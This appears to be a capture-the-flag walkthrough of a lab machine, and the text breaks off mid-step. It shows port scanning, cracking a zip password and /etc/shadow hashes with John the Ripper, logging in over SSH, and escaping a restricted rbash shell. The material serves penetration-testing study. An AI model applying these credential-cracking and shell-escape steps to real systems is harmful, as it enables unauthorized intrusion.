PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|_
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
On the port 80 itself has a save.zip
Download the zip file and unzip it, and it needs password, so we john it out
┌──(kali㉿VirtualBox)-[~/Downloads]
└─$ zip2john save.zip > hash
┌──(kali㉿VirtualBox)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
manuel (save.zip)
So the password is manuel
After unzipping the save.zip we have a bunch of spicy stuff
┌──(kali㉿VirtualBox)-[~/Downloads/etc]
└─$ ll
total 24K
-rw-r--r-- 1 kali kali 829 Jun 27 2020 group
-rw-r--r-- 1 kali kali 33 Jun 27 2020 hostname
-rw-r--r-- 1 kali kali 185 Jun 27 2020 hosts
-rw-r--r-- 1 kali kali 1.8K Jun 27 2020 passwd
-rw-r----- 1 kali kali 1.1K Jul 7 2020 shadow
-r--r----- 1 kali kali 669 Feb 2 2020 sudoers
We unshadow the passwd and shadow into hehe.txt and john it again
┌──(kali㉿VirtualBox)-[~/Downloads/etc]
└─$ unshadow passwd shadow > hehe.txt
┌──(kali㉿VirtualBox)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hehe.txt
server (296640a3b825115a47b68fc44501c828)
Such a long username, now ssh into it
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected]
[email protected]'s password: **server**
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
Even though we login successfully however the shell is rbash which means it is stupid and we can’t do any command using it, sample as per following:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ less local.txt
-rbash: less: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ vi local.txt
-rbash: vi: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ more local.txt
-rbash: more: command not found
rbash stands for restricted bash so perhaps its the challenge here.
After some research on SSH, we can use flag -t bash --noprofile to escape rbash
┌──(kali㉿VirtualBox)-[~]
└─$ ssh [email protected] -t "bash --noprofile"
[email protected]'s password: server
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
bash: whoami: command not found
However it is still a restricted environment, however we can run / command from the start so: